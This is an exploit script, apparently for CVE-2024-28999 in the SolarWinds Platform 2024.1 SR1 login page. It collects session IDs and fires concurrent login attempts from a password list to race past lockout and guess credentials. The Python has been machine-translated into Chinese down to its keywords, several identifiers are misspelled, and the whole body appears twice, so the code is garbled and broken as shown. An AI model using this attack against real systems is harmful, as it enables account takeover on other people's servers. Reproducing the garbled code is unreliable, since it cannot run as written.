#利用标题: Solarwinds平台2024.1 SR1-种族条件
#CVE: CVE-2024-28999
#受影响的版本: SolarWinds平台2024.1 SR 1和以前的版本
#作者: Elhussain Fathy,又名0xSphinx
导入请求
导入urllib3
导入异步
导入aiohttp
urllib3.disable_warnings(urllib3.exceptions.insecurreequestwarning)
http=urllib3.poolmanager(cert_reqs='cert_required')
#主机='192.168.1.1'
#用户名='admin'
#file_path='passwords.txt'
主机=输入('输入host:')
用户名=输入('输入用户名:')
file_path=输入('输入密码文件路径:')
利用=0
url=f'https://{主机} :443/orion/login.aspx?returnurl=%2f'
密码=[]
用file:打开(file_path,'r')
对于File:中的行
word=line.strip()
passwasss.append(word)
打印(已测试的密码: {len(passwasss)}')
标题={
'host':主持人,
}
会话=[]
对于_范围(LEN(密码)):
响应=requests.get(url,headers=headers,verify=false,stream=false)
cookies=response.headers.get('set-cookie','')
session_id=cookies.split('asp.net_sessionid=')[1] .split(';')[0]
sessions.append(session_id)
异步def send_request(会话,用户名,密码):
标题={
'host':主持人,
'content-type':'应用程序/x-www-form-urlencoded',
'Accept':'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,/; q=0.8',
'cookie': f'asp.net_sessionid={session}; TestCookiesUpport=支持; Orion_issessionexp=true',
}
data=f'__ eventtarget=ctl00%24身体智能%24loginbutton__eventargument=__ ViewState=aeqknijmher5jzhmrrxsjzprqhtz%2botqkfnmcfnmcfnmc3ecmltc%2fijqs%2fijqs 37FTVDMFN83YUTGHBJILMRHWO0UVZWCG2CO%2B%2FO2CEYGVZJB1UME1UKRVCOFYR08HJFGUJOR4Q9GXVX0FMHVTS0FMHVMHVMHVMHVMHHVMHHHHH64M5FBBZTL9DFBLEDBLUBBUL9DFBUBBLE RssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3 %2F1UHWB8FFC8MIK%3D__ViewStateGenerator=01070692CTL00%24BodyContent%24Username={userName} ctl00%24 body content%24PasseNT%24password={passwass}'
与aiohttp.clientsession()为:的异步
async with session.post(url,headers=headers,data=data,ssl=false,ally_redirects=false)as wenspy:
如果响应。STATUS==302:
全球利用
利用=1
打印(f'Exploited成功用户名: {username},password: {password}')
异步def main():
任务=[]
对于我的范围(len(passwess)):
会话=会话
密码=密码
task=asyncio.create_task(send_request(session,username,passwass))
tasks.append(任务)
等待asyncio.gather(*任务)
asyncio.run(main())
如果(未利用):
打印(“剥削失败”)
#CVE: CVE-2024-28999
#受影响的版本: SolarWinds平台2024.1 SR 1和以前的版本
#作者: Elhussain Fathy,又名0xSphinx
导入请求
导入urllib3
导入异步
导入aiohttp
urllib3.disable_warnings(urllib3.exceptions.insecurreequestwarning)
http=urllib3.poolmanager(cert_reqs='cert_required')
#主机='192.168.1.1'
#用户名='admin'
#file_path='passwords.txt'
主机=输入('输入host:')
用户名=输入('输入用户名:')
file_path=输入('输入密码文件路径:')
利用=0
url=f'https://{主机} :443/orion/login.aspx?returnurl=%2f'
密码=[]
用file:打开(file_path,'r')
对于File:中的行
word=line.strip()
passwasss.append(word)
打印(已测试的密码: {len(passwasss)}')
标题={
'host':主持人,
}
会话=[]
对于_范围(LEN(密码)):
响应=requests.get(url,headers=headers,verify=false,stream=false)
cookies=response.headers.get('set-cookie','')
session_id=cookies.split('asp.net_sessionid=')[1] .split(';')[0]
sessions.append(session_id)
异步def send_request(会话,用户名,密码):
标题={
'host':主持人,
'content-type':'应用程序/x-www-form-urlencoded',
'Accept':'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,/; q=0.8',
'cookie': f'asp.net_sessionid={session}; TestCookiesUpport=支持; Orion_issessionexp=true',
}
data=f'__ eventtarget=ctl00%24身体智能%24loginbutton__eventargument=__ ViewState=aeqknijmher5jzhmrrxsjzprqhtz%2botqkfnmcfnmcfnmc3ecmltc%2fijqs%2fijqs 37FTVDMFN83YUTGHBJILMRHWO0UVZWCG2CO%2B%2FO2CEYGVZJB1UME1UKRVCOFYR08HJFGUJOR4Q9GXVX0FMHVTS0FMHVMHVMHVMHVMHHVMHHHHH64M5FBBZTL9DFBLEDBLUBBUL9DFBUBBLE RssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3 %2F1UHWB8FFC8MIK%3D__ViewStateGenerator=01070692CTL00%24BodyContent%24Username={userName} ctl00%24 body content%24PasseNT%24password={passwass}'
与aiohttp.clientsession()为:的异步
async with session.post(url,headers=headers,data=data,ssl=false,ally_redirects=false)as wenspy:
如果响应。STATUS==302:
全球利用
利用=1
打印(f'Exploited成功用户名: {username},password: {password}')
异步def main():
任务=[]
对于我的范围(len(passwess)):
会话=会话
密码=密码
task=asyncio.create_task(send_request(session,username,passwass))
tasks.append(任务)
等待asyncio.gather(*任务)
asyncio.run(main())
如果(未利用):
打印(“剥削失败”)